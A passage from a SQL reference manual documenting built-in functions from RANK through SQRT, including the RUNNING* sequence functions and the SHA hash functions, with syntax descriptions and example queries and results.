_i2_, using the alternative RANK syntax:\r\n+\r\n```\r\nSELECT i2, RANK (i2) AS rank\r\nFROM cat.sch.seqfcn SEQUENCE BY i2;\r\n\r\ni2 rank\r\n----------- --------------------\r\n 100 1\r\n 100 1\r\n 200 3\r\n 200 3\r\n 200 3\r\n 300 6\r\n ? 7\r\n ? 7\r\n\r\n--- 8 row(s) selected.\r\n```\r\n+\r\nNotice that the two NULL values received the same rank.\r\n\r\n<<<\r\n* Return the rank of _i2_ descending, using the alternative RANK syntax:\r\n+\r\n```\r\nSELECT i2, RANK (i2) AS rank\r\nFROM cat.sch.seqfcn SEQUENCE BY i2 DESC;\r\n\r\ni2 rank\r\n----------- --------------------\r\n ? 1\r\n ? 1
 300 3\r\n 200 4\r\n 200 4\r\n 200 4\r\n 100 7\r\n 100 7\r\n\r\n--- 8 row(s) selected.\r\n```\r\n\r\n* Return the rank of _i2_ descending, excluding NULL values:\r\n+\r\n```\r\nSELECT i2, RANK (i2) AS rank\r\nFROM cat.sch.seqfcn WHERE i2 IS NOT NULL SEQUENCE BY i2 DESC;\r\n\r\ni2 rank\r\n----------- --------------------\r\n 300 1\r\n 200 2\r\n 200 2\r\n 200 2\r\n 100 5\r\n 100 5\r\n\r\n--- 6 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[repeat_function]]\r\n== REPEAT Function\r\n\r\nThe REPEAT function returns a character string composed of the\r\nevaluation of a character expression repeated a specified number of\r\ntimes.\r\n\r\nREPEAT is a {project-name} SQL extension.\r\n\r\n```\r\nREPEAT (character-expr, count)\r\n```\r\n\r\n* `_character-expr_`\r\n+\r\nspecifies the source string from which to return the specified number of\r\nrepeated strings. The source string is an SQL character value expression.\r\nThe operand is the result of evaluating _character-expr_.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_count_`\r\n+\r\nspecifies the number of times the source string _character-expr_ is to\r\nbe repeated. The number _count_ must be a value greater than or equal\r\nto zero of exact numeric data type and with a scale of zero.\r\n\r\n[[examples_of_repeat]]\r\n=== Examples of REPEAT\r\n\r\n* Return this quote from Act 5, Scene 3, of King Lear:\r\n+\r\n```\r\nREPEAT ('Never,', 5)\r\n\r\nNever,Never,Never,Never,Never,\r\n```\r\n\r\n<<<\r\n[[replace_function]]\r\n== REPLACE Function\r\n\r\nThe REPLACE function returns a character string where all occurrences of\r\na specified character string in the original string are replaced with\r\nanother character string. All three character value expressions must be\r\ncomparable types. The return value is the VARCHAR type.\r\n\r\nREPLACE is a {project-name} SQL extension.\r\n\r\n```\r\nREPLACE (char-expr-1, char-expr-2, char-expr-3)\r\n```\r\n\r\n* `_char-expr-1_, _char-expr-2_, _char-expr-3_`\r\n+\r\nare SQL character value expressions. The operands are the result of\r\nevaluating the character expressions. All occurrences of _char-expr-2_\r\nin _char-expr-1_ are replaced by _char-expr-3_.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[examples_of_replace]]\r\n=== Examples of REPLACE\r\n\r\n* Use the REPLACE function to change job descriptions so that occurrences\r\nof the company name are updated:\r\n+\r\n```\r\nSELECT jobdesc FROM persnl.job;\r\n\r\njob_description\r\n------------------\r\nMANAGER COMNET\r\nPRODUCTION COMNET\r\nASSEMBLER COMNET\r\nSALESREP COMNET\r\nSYSTEM ANAL COMNET\r\n...\r\n\r\n--- 10 row(s) selected.\r\n\r\nUPDATE persnl.job\r\nSET jobdesc = REPLACE(jobdesc, 'COMNET', 'TDMNET');\r\n\r\nJob Description\r\n------------------\r\nMANAGER TDMNET\r\nPRODUCTION TDMNET\r\nASSEMBLER TDMNET\r\nSALESREP TDMNET\r\nSYSTEM ANAL TDMNET\r\n...\r\n\r\n--- 10 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[right_function]]\r\n== RIGHT Function\r\n\r\nThe RIGHT function returns the rightmost specified number of characters\r\nfrom a character expression. Every character, including multi-byte\r\ncharacters, is treated as one character.\r\n\r\nRIGHT is a {project-name} SQL extension.\r\n\r\n```\r\nRIGHT (character-expr, count)\r\n```\r\n\r\n* `_character-expr_`\r\n+\r\nspecifies the source string from which to return the rightmost specified\r\nnumber of characters.
The source string is an SQL character value expression.\r\nThe operand is the result of evaluating _character-expr_.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_count_`\r\n+\r\nspecifies the number of characters to return from _character-expr_.\r\nThe number _count_ must be a value of exact numeric data type with a scale\r\nof zero.\r\n\r\n[[examples_of_right]]\r\n=== Examples of RIGHT\r\n\r\n* Return 'smith':\r\n+\r\n```\r\nRIGHT('robert_john_smith', 5)\r\n```\r\n\r\n* Suppose that a six-character company literal has been concatenated as\r\nthe first six characters to the job descriptions in the JOB table. Use\r\nthe RIGHT function to remove the company literal from the job\r\ndescriptions:\r\n+\r\n```\r\nUPDATE persnl.job\r\nSET jobdesc = RIGHT (jobdesc, 12);\r\n```\r\n\r\n<<<\r\n[[round_function]]\r\n== ROUND Function\r\n\r\nThe ROUND function returns the value of _numeric-expr_ rounded to _num_\r\nplaces to the right of the decimal point.\r\n\r\nROUND is a {project-name} SQL extension.\r\n\r\n```\r\nROUND(numeric-expr [ , num ] )\r\n```\r\n\r\n* `_numeric-expr_`\r\n+\r\nis an SQL numeric value expression.\r\n\r\n* `_num_`\r\n+\r\nspecifies the number of places to the right of the decimal point for\r\nrounding. If _num_ is a negative number, all places to the right of the\r\ndecimal point and _num_ places to the left of the decimal point are\r\nzeroed. If _num_ is not specified or is 0, then all places to the right\r\nof the decimal point are zeroed.\r\n+\r\nFor any exact numeric value, the value _numeric-expr_ is rounded away\r\nfrom 0 (for example, to x+1 when x.5 is positive and to x-1 when x.5 is\r\nnegative). For the inexact numeric values (real, float, and double), the\r\nvalue _numeric-expr_ is rounded toward the nearest even number.\r\n\r\n<<<\r\n[[examples_of_round]]\r\n=== Examples of ROUND\r\n\r\n* This function returns the value of 123.46.\r\n+\r\n```\r\nROUND(123.4567,2)\r\n```\r\n\r\n* This function returns the value of 123.\r\n+\r\n```\r\nROUND(123.4567,0)\r\n```\r\n\r\n* This function returns the value of 120.\r\n+\r\n```\r\nROUND(123.4567,-1)\r\n```\r\n\r\n* This function returns the value of 0.\r\n+\r\n```\r\nROUND(999.0,-4)\r\n```\r\n\r\n* This function returns the value of 1000.\r\n+\r\n```\r\nROUND(999.0,-3)\r\n```\r\n\r\n* This function returns the value of 2.0E+000.\r\n+\r\n```\r\nROUND(1.5E+000,0)\r\n```\r\n\r\n* This function returns the value of 2.0E+000.\r\n+\r\n```\r\nROUND(2.5E+000,0)\r\n```\r\n\r\n* This function returns the value of 1.0E+000.\r\n+\r\n```\r\nROUND(1.4E+000,0)\r\n```\r\n\r\n<<<\r\n[[rows_since_function]]\r\n== ROWS SINCE Function\r\n\r\nThe ROWS SINCE function is a sequence function that returns the number\r\nof rows counted since the specified condition was last true in the\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nROWS SINCE is a {project-name} SQL extension.\r\n\r\n```\r\nROWS SINCE [INCLUSIVE] (condition [, max-rows])\r\n```\r\n\r\n* `INCLUSIVE`\r\n+\r\nspecifies the current row is to be considered. If you specify INCLUSIVE,\r\nthe condition is evaluated in the current row. Otherwise, the condition\r\nis evaluated beginning with the previous row.
If you specify INCLUSIVE\r\nand the condition is true in the current row, ROWS SINCE returns 0.\r\n\r\n* `_condition_`\r\n+\r\nspecifies a condition to be considered for each row in the result table.\r\nEach column in _condition_ must be a column that exists in the result\r\ntable. If the condition has never been true for the result table, ROWS\r\nSINCE returns null.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows from the current row\r\nto consider. If the condition has never been true for _max-rows_ from\r\nthe current row, or if _max-rows_ is negative or null, ROWS SINCE\r\nreturns null.\r\n\r\n[[considerations_for_rows_since]]\r\n=== Considerations for ROWS SINCE\r\n\r\n[[counting_the_rows]]\r\n==== Counting the Rows\r\n\r\nIf you specify INCLUSIVE, the condition in each row of the result table\r\nis evaluated starting with the current row as row 0 (zero) (up to the\r\nmaximum number of rows or the size of the result table). Otherwise, the\r\ncondition is evaluated starting with the previous row as row 1.\r\n\r\nIf a row is reached where the condition is true, ROWS SINCE returns the\r\nnumber of rows counted so far. Otherwise, if the condition is never true\r\nwithin the result table being considered, ROWS SINCE returns null.\r\n{project-name} SQL then goes to the next row as the new current row.\r\n\r\n[[examples_of_rows_since]]\r\n=== Examples of ROWS SINCE\r\n\r\n* Return the number of rows since the condition _i1 IS NULL_ became true:\r\n+\r\n```\r\nSELECT ROWS SINCE (i1 IS NULL) AS rows_since_null\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nrows_since_null\r\n---------------\r\n ?\r\n ?\r\n 1\r\n 2\r\n 1\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n* Return the number of rows since the condition _i1 < i2_ became true:\r\n+\r\n```\r\nSELECT ROWS SINCE (i1<i2), ROWS SINCE INCLUSIVE (i1<i2)\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR) (EXPR)\r\n--------------- ---------------\r\n ? 0\r\n 1 1\r\n 2 0\r\n 1 1\r\n 2 0\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[rows_since_changed_function]]\r\n== ROWS SINCE CHANGED Function\r\n\r\nThe ROWS SINCE CHANGED function is a sequence function that returns the\r\nnumber of rows counted since the specified set of values last changed in\r\nthe intermediate result table ordered by a SEQUENCE BY clause in a\r\nSELECT statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nROWS SINCE CHANGED is a {project-name} SQL extension.\r\n\r\n```\r\nROWS SINCE CHANGED (column-expression-list)\r\n```\r\n\r\n* `_column-expression-list_`\r\n+\r\nis a comma-separated list that specifies a derived column list\r\ndetermined by the evaluation of the column expression list.\r\nROWS SINCE CHANGED returns the number of rows counted since the\r\nvalues of _column-expression-list_ changed.\r\n\r\n[[considerations_for_rows_since_changed]]\r\n=== Considerations for ROWS SINCE CHANGED\r\n\r\n[[counting_the_rows_2]]\r\n==== Counting the Rows\r\n\r\nFor the first row in the intermediate result table, the count is 1. For\r\nsubsequent rows that have the same value for _column-expression-list_ as\r\nthe previous row, the count is 1 plus the count\r\nin the previous row.
For subsequent rows that have a different value of\r\n_column-expression-list_ than the previous row, the count is 1.\r\n\r\n[[examples_of_rows_since_changed]]\r\n=== Examples of ROWS SINCE CHANGED\r\n\r\n* Return the number of rows since the value _i1_ last changed:\r\n+\r\n```\r\nSELECT ROWS SINCE CHANGED (i1)\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n```\r\n\r\n* Return the number of rows since the values _i1_ and _ts_ last changed:\r\n+\r\n```\r\nSELECT ROWS SINCE CHANGED (i1, ts)\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n```\r\n\r\n<<<\r\n[[rpad_function]]\r\n== RPAD Function\r\n\r\nThe RPAD function pads the right side of a string with the specified\r\nstring. Every character in the string, including multi-byte characters,\r\nis treated as one character.\r\n\r\nRPAD is a {project-name} SQL extension.\r\n\r\n```\r\nRPAD (str, len [, padstr])\r\n```\r\n\r\n* `_str_`\r\n+\r\ncan be an expression.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_len_`\r\n+\r\nidentifies the desired number of characters to be returned and can be an\r\nexpression but must be an integral value. If _len_ is equal to the\r\nlength of the string, no change is made. If _len_ is smaller than the\r\nstring size, the string is truncated.\r\n\r\n* `_padstr_`\r\n+\r\nspecifies the string used for padding; it can be an expression. If\r\n_padstr_ is omitted, the string is padded with spaces.\r\n\r\n<<<\r\n[[examples_of_rpad_function]]\r\n=== Examples of RPAD Function\r\n\r\n* This function returns 'kite' padded with three trailing spaces:\r\n+\r\n```\r\nRPAD('kite', 7)\r\n```\r\n\r\n* This function returns 'ki':\r\n+\r\n```\r\nRPAD('kite', 2)\r\n```\r\n\r\n* This function returns 'kite0000':\r\n+\r\n```\r\nRPAD('kite', 8, '0')\r\n```\r\n\r\n* This function returns 'go fly a kite':\r\n+\r\n```\r\nRPAD('go fly a kite', 13, 'z')\r\n```\r\n\r\n* This function returns 'go fly a kitez':\r\n+\r\n```\r\nRPAD('go fly a kite', 14, 'z')\r\n```\r\n\r\n* This function returns 'kitegoflygoflygof':\r\n+\r\n```\r\nRPAD('kite', 17, 'gofly')\r\n```\r\n\r\n<<<\r\n[[rtrim_function]]\r\n== RTRIM Function\r\n\r\nThe RTRIM function removes trailing spaces from a character string. If\r\nyou must remove any trailing character other than space, use the TRIM\r\nfunction and specify the value of the character.\r\nSee the <<trim_function,TRIM Function>>.\r\n\r\nRTRIM is a {project-name} SQL extension.\r\n\r\n```\r\nRTRIM (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression and specifies the string from which\r\nto trim trailing spaces.\r\n+\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_rtrim]]\r\n=== Considerations for RTRIM\r\n\r\n[[result_of_rtrim]]\r\n==== Result of RTRIM\r\n\r\nThe result is always of type VARCHAR, with maximum length equal to the\r\nfixed length or maximum variable length of _character-expression_.\r\n\r\n[[examples_of_rtrim]]\r\n=== Examples of RTRIM\r\n\r\n* Return ' Robert':\r\n+\r\n```\r\nRTRIM (' Robert ')\r\n```\r\n+\r\nSee <<trim_function,TRIM Function>> and <<ltrim_function,LTRIM Function>>.\r\n\r\n<<<\r\n[[runningavg_function]]\r\n== RUNNINGAVG Function\r\n\r\nThe RUNNINGAVG function is a sequence function that returns the average\r\nof non-null values of a column up to and including the current row of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement.
See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGAVG is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGAVG (_column-expression_)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGAVG returns the average of non-null values of _column-expression_\r\nup to and including the current row.\r\n\r\n[[considerations_for_runningavg]]\r\n=== Considerations for RUNNINGAVG\r\n\r\n[[equivalent_result]]\r\n==== Equivalent Result\r\n\r\nThe result of RUNNINGAVG is equivalent to:\r\n\r\n```\r\nRUNNINGSUM(column-expr) \/ RUNNINGCOUNT(*)\r\n```\r\n\r\n[[examples_of_runningavg]]\r\n=== Examples of RUNNINGAVG\r\n\r\n* Return the average of non-null values of _i1_ up to and including the\r\ncurrent row:\r\n+\r\n```\r\nSELECT RUNNINGAVG(i1) AS avg_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\navg_i1\r\n--------------------\r\n 6215\r\n 17194\r\n 11463\r\n 9746\r\n 10190\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningcount_function]]\r\n== RUNNINGCOUNT Function\r\n\r\nThe RUNNINGCOUNT function is a sequence function that returns the number\r\nof rows up to and including the current row of an intermediate result\r\ntable ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGCOUNT is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGCOUNT {(*) | (column-expression)}\r\n```\r\n\r\n* `*`\r\n+\r\nas an argument causes RUNNINGCOUNT(*) to return the number of rows in\r\nthe intermediate result table up to and including the current row.\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If _column-expression_ is the argument, RUNNINGCOUNT returns\r\nthe number of rows containing non-null values of _column-expression_ in the\r\nintermediate result table up to and including the current row.\r\n\r\n\r\n[[considerations_for_runningcount]]\r\n=== Considerations for RUNNINGCOUNT\r\n\r\n[[no_distinct_clause]]\r\n==== No DISTINCT Clause\r\n\r\nThe RUNNINGCOUNT sequence function is defined differently from the COUNT\r\naggregate function. If you specify DISTINCT for the COUNT aggregate\r\nfunction, duplicate values are eliminated before COUNT is applied. You\r\ncannot specify DISTINCT for the RUNNINGCOUNT sequence function;\r\nduplicate values are counted.\r\n\r\n<<<\r\n[[examples_of_runningcount]]\r\n=== Examples of RUNNINGCOUNT\r\n\r\n* Return the number of rows that include non-null values of _i1_ up to and\r\nincluding the current row:\r\n+\r\n```\r\nSELECT RUNNINGCOUNT (i1) AS count_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\ncount_i1\r\n------------\r\n 1\r\n 2\r\n 2\r\n 3\r\n 4\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningmax_function]]\r\n== RUNNINGMAX Function\r\n\r\nThe RUNNINGMAX function is a sequence function that returns the maximum\r\nof values of a column up to and including the current row of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. 
See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGMAX is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGMAX (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGMAX returns the maximum of values of _column-expression_ up to\r\nand including the current row.\r\n\r\n[[examples_of_runningmax]]\r\n=== Examples of RUNNINGMAX\r\n\r\n* Return the maximum of values of _i1_ up to and including the current row:\r\n+\r\n```\r\nSELECT RUNNINGMAX(i1) AS max_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nmax_i1\r\n------------\r\n 6215\r\n 28174\r\n 28174\r\n 28174\r\n 28174\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningmin_function]]\r\n== RUNNINGMIN Function\r\n\r\nThe RUNNINGMIN function is a sequence function that returns the minimum\r\nof values of a column up to and including the current row of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGMIN is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGMIN (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGMIN returns the minimum of values of _column-expression_ up to\r\nand including the current row.\r\n\r\n[[examples_of_runningmin]]\r\n=== Examples of RUNNINGMIN\r\n\r\n* Return the minimum of values of _i1_ up to and including the current row:\r\n+\r\n```\r\nSELECT RUNNINGMIN(i1) AS min_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nmin_i1\r\n------------\r\n 6215\r\n 6215\r\n 6215\r\n 4597\r\n 4597\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningstddev_function]]\r\n== RUNNINGSTDDEV Function\r\n\r\nThe RUNNINGSTDDEV function is a sequence function that returns the\r\nstandard deviation of non-null values of a column up to and including the\r\ncurrent row of an intermediate result table ordered by a SEQUENCE BY\r\nclause in a SELECT statement.\r\nSee <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGSTDDEV is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGSTDDEV (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGSTDDEV returns the standard deviation of non-null values of\r\n_column-expression_ up to and including the current row.\r\n\r\n[[considerations_for_runningstddev]]\r\n=== Considerations for RUNNINGSTDDEV\r\n\r\n[[equivalent_result_2]]\r\n==== Equivalent Result\r\n\r\nThe result of RUNNINGSTDDEV is equivalent to:\r\n\r\n```\r\nSQRT(RUNNINGVARIANCE(column-expression))\r\n```\r\n\r\n<<<\r\n[[examples_of_runningstddev]]\r\n=== Examples of RUNNINGSTDDEV\r\n\r\n* Return the standard deviation of non-null values of _i1_ up to and\r\nincluding the current row:\r\n+\r\n```\r\nSELECT RUNNINGSTDDEV (i1) AS stddev_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nSTDDEV_I1\r\n-------------------------\r\n 0.00000000000000000E+000\r\n 1.55273578080753976E+004\r\n 1.48020166531456112E+004\r\n 1.25639147428923072E+004\r\n 1.09258501408357232E+004\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n* You can use the CAST function for display purposes.
For example:\r\n+\r\n```\r\nSELECT CAST(RUNNINGSTDDEV(i1) AS DEC(18,3))\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR)\r\n--------------------\r\n .000\r\n 15527.357\r\n 14802.016\r\n 12563.914\r\n 10925.850\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningsum_function]]\r\n== RUNNINGSUM Function\r\n\r\nThe RUNNINGSUM function is a sequence function that returns the sum of\r\nnon-null values of a column up to and including the current row of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGSUM is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGSUM (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGSUM returns the sum of non-null values of _column-expression_ up\r\nto and including the current row.\r\n\r\n[[examples_of_runningsum]]\r\n=== Examples of RUNNINGSUM\r\n\r\n* Return the sum of non-null values of _i1_ up to and including the current\r\nrow:\r\n+\r\n```\r\nSELECT RUNNINGSUM(i1) AS sum_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nsum_i1\r\n--------------------\r\n 6215\r\n 34389\r\n 34389\r\n 38986\r\n 50952\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningvariance_function]]\r\n== RUNNINGVARIANCE Function\r\n\r\nThe RUNNINGVARIANCE function is a sequence function that returns the\r\nvariance of non-null values of a column up to and including the current\r\nrow of an intermediate result table ordered by a SEQUENCE BY clause in a\r\nSELECT statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGVARIANCE is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGVARIANCE (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGVARIANCE returns the variance of non-null values of\r\n_column-expression_ up to and including the current row.\r\n\r\n[[examples_of_runningvariance]]\r\n=== Examples of RUNNINGVARIANCE\r\n\r\n* Return the variance of non-null values of _i1_ up to and including the\r\ncurrent row:\r\n+\r\n```\r\nSELECT RUNNINGVARIANCE(i1) AS variance_i1\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nvariance_i1\r\n-------------------------\r\n 0.00000000000000000E+000\r\n 2.41098840499999960E+008\r\n 2.19099696999999968E+008\r\n 1.57851953666666640E+008\r\n 1.19374201299999980E+008\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n* You can use the CAST function for display purposes. For example:\r\n+\r\n```\r\nSELECT CAST(RUNNINGVARIANCE (i1) AS DEC (18,3))\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR)\r\n--------------------\r\n .000\r\n 241098840.500\r\n 219099697.000\r\n 157851953.666\r\n 119374201.299\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[second_function]]\r\n== SECOND Function\r\n\r\nThe SECOND function converts a TIME or TIMESTAMP expression into an\r\nINTEGER value in the range 0 through 59 that represents the\r\ncorresponding second of the hour.\r\n\r\nSECOND is a {project-name} SQL extension.\r\n\r\n```\r\nSECOND (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type TIME or\r\nTIMESTAMP.
See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_second]]\r\n=== Examples of SECOND\r\n\r\n* Return a numeric value that represents the second of the minute from the\r\n_ship_timestamp_ column:\r\n\r\n```\r\nSELECT start_date, ship_timestamp, SECOND(ship_timestamp)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- -----------\r\n2008-04-10 2008-04-21 08:15:00.000000 .000000\r\n```\r\n\r\n<<<\r\n[[sha_function]]\r\n== SHA Function\r\n\r\nCalculates an SHA-1 160-bit checksum for the string, as described in\r\nRFC 3174 (Secure Hash Algorithm). The value is returned as a string of\r\n40 hexadecimal digits, or NULL if the argument was NULL.\r\n\r\n[[examples_of_sha]]\r\n=== Examples of SHA\r\n```\r\n>>SELECT SHA1('abc') from dual;\r\n\r\n(EXPR)\r\n-----------------------------------------\r\n'a9993e364706816aba3e25717850c26c9cd0d89d'\r\n```\r\n\r\n<<<\r\n[[sha2_function]]\r\n== SHA2 Function\r\n\r\nCalculates the SHA-2 family of hash functions (SHA-224, SHA-256, SHA-384,\r\nand SHA-512). The first argument is the cleartext string to be hashed.\r\nThe second argument indicates the desired bit length of the result, which\r\nmust have a value of 224, 256, 384, or 512.\r\nIf either argument is NULL or the hash length is not one of the permitted values,\r\nthe return value is NULL. Otherwise, the function result is a hash value containing\r\nthe desired number of bits.\r\n\r\n[[examples_of_sha2]]\r\n=== Examples of SHA2\r\n```\r\n>>SELECT SHA2('abc', 224) from dual;\r\n\r\n(EXPR)\r\n--------------------------------------------------------\r\n'23097d223405d8228642a477bda255b32aadbce4bda0b3f7e36c9da7'\r\n```\r\n
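\r\nThe other bit lengths follow the same call pattern. For example, a\r\n256-bit request (the value shown is the published SHA-256 test vector\r\nfor 'abc'):\r\n\r\n```\r\n>>SELECT SHA2('abc', 256) from dual;\r\n\r\n(EXPR)\r\n------------------------------------------------------------------\r\n'ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad'\r\n```\r\n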
<<<\r\n[[sign_function]]\r\n== SIGN Function\r\n\r\nThe SIGN function returns an indicator of the sign of a numeric value\r\nexpression. If the value is less than zero, the function returns -1 as\r\nthe indicator. If the value is zero, the function returns 0. If the\r\nvalue is greater than zero, the function returns 1.\r\n\r\nSIGN is a {project-name} SQL extension.\r\n\r\n```\r\nSIGN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the SIGN function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_sign]]\r\n=== Examples of SIGN\r\n\r\n* Return the value -1:\r\n+\r\n```\r\nSIGN(-20 + 12)\r\n```\r\n\r\n* Return the value 0:\r\n+\r\n```\r\nSIGN(-20 + 20)\r\n```\r\n\r\n* Return the value 1:\r\n+\r\n```\r\nSIGN(-20 + 22)\r\n```\r\n\r\n<<<\r\n[[sin_function]]\r\n== SIN Function\r\n\r\nThe SIN function returns the sine of a numeric value expression, where\r\nthe expression is an angle expressed in radians.\r\n\r\nSIN is a {project-name} SQL extension.\r\n\r\n```\r\nSIN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the SIN function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_sin]]\r\n=== Examples of SIN\r\n\r\n* This function returns the value 3.42052233254419840E-001, or\r\napproximately 0.3420, the sine of 0.3491 (which is 20 degrees):\r\n+\r\n```\r\nSIN (0.3491)\r\n```\r\n\r\n<<<\r\n[[sinh_function]]\r\n== SINH Function\r\n\r\nThe SINH function returns the hyperbolic sine of a numeric value\r\nexpression, where the expression is an angle expressed in radians.\r\n\r\nSINH is a {project-name} SQL extension.\r\n\r\n```\r\nSINH (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the SINH function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_sinh]]\r\n=== Examples of SINH\r\n\r\n* This function returns the value 1.60191908030082560E+000, or\r\napproximately 1.6019, the hyperbolic sine of 1.25:\r\n+\r\n```\r\nSINH (1.25)\r\n```\r\n\r\n<<<\r\n[[space_function]]\r\n== SPACE Function\r\n\r\nThe SPACE function returns a character string consisting of a specified\r\nnumber of spaces, each of which is 0x20 or 0x0020, depending on the\r\nchosen character set.\r\n\r\nSPACE is a {project-name} SQL extension.\r\n\r\n```\r\nSPACE (length [, char-set-name])\r\n```\r\n\r\n* `_length_`\r\n+\r\nspecifies the number of characters to be returned. The number _length_\r\nmust be a value greater than or equal to zero of exact numeric data type\r\nand with a scale of zero. _length_ cannot exceed 32768 for the ISO8859-1\r\nor UTF8 character sets.\r\n\r\n* `_char-set-name_`\r\n+\r\ncan be ISO88591 or UTF8. If you do not specify this second argument, the\r\ndefault is the default character set.\r\n+\r\nThe returned character string will be of data type VARCHAR associated\r\nwith the character set specified by _char-set-name_.\r\n\r\n[[examples_of_space]]\r\n=== Examples of SPACE\r\n\r\n* Return three spaces:\r\n+\r\n```\r\nSPACE(3)\r\n```\r\n\r\n<<<\r\n[[sqrt_function]]\r\n== SQRT Function\r\n\r\nThe SQRT function returns the square root of a numeric value expression.\r\nSQRT is a {project-name} SQL extension.\r\n\r\n```\r\nSQRT (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the SQRT function. The value of the argument must not be a\r\nnegative number. 
